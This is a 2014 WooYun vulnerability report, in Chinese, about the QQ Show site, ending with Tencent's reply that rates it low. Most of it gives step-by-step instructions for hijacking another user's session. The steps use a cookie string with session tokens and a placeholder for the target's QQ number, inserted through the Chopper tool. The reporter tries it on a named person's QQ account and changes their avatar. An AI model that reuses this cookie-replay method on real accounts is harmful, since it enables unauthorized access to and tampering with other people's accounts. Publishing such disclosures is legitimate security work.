2014-05-03:细节已通知厂商并且等待厂商处理中
2014-05-04:厂商已经确认,细节仅向厂商公开
2014-05-14:细节向核心白帽子及相关领域专家公开
2014-05-24:细节向普通白帽子公开
2014-06-03:细节向实习白帽子公开
2014-06-17:细节向公众公开
话说菜刀原来功能这么强大的。我第一次才知道它原来这么腻害的。。哈哈
打开QQ秀官方网站http://show.qq.com/
右击浏览器——扩展功能
登录后的网站。
我就随便找个QQ测试一下 。咱们找肉肉的。。他QQ2928983512
代码pt2gguin=o0这里改成你要登录的QQ号; RK=jq9mYacVWP; ptcz=6caec20a5a6eb59b4d68a0ad0f115538f824fe104e5c23ba41d5b0b8cc8dcbb1; ac=1,014,007; uin_cookie=156498721; euin_cookie=FCE056305C78890DBD4E32329F544F3126CE6F925DA12B85; pgv_pvid=4515140242; pgv_info=ssid=s1163162683; uin=o0这里改成你要登录的QQ号; skey=@m8o7siT9t; ptisp=cnc; session=1; qs_tk=44; ts_last=show.qq.com/; ts_refer=ADTAGclient.im.card.qqshow; ts_uid=5199038500
http://show.qq.com/?ADTAG=client.im.card.qqshow&opuin=这里改成你要登录的QQ号&ptlang=2052#u%3DphotoShow/html/index.html%253Fsex%253DUM%2526rcount%253D0
登陆了这个网站后
扩展功能把里面的cookie清空。
然后引用
代码pt2gguin=o0这里改成你要登录的QQ号; RK=jq9mYacVWP; ptcz=6caec20a5a6eb59b4d68a0ad0f115538f824fe104e5c23ba41d5b0b8cc8dcbb1; ac=1,014,007; uin_cookie=156498721; euin_cookie=FCE056305C78890DBD4E32329F544F3126CE6F925DA12B85; pgv_pvid=4515140242; pgv_info=ssid=s1163162683; uin=o0这里改成你要登录的QQ号; skey=@m8o7siT9t; ptisp=cnc; session=1; qs_tk=44; ts_last=sho
好了。。。
咱们来给他换个QQ秀
←这个是它刚刚的QQ秀。。现在我给它换了
霸气
修复方案:求礼物哈
版权声明:转载请注明来源 泳少@乌云 漏洞回应 厂商回应:危害等级:低
漏洞Rank:1
确认时间:2014-05-04 12:25
厂商回复:非常感谢您的报告。该问题已经通过其它渠道发现并已着手处理。如您有进一步发现,请及时与我们联系。如果您有任何的疑问,欢迎反馈,我们会有专人跟进处理。
最新状态:暂无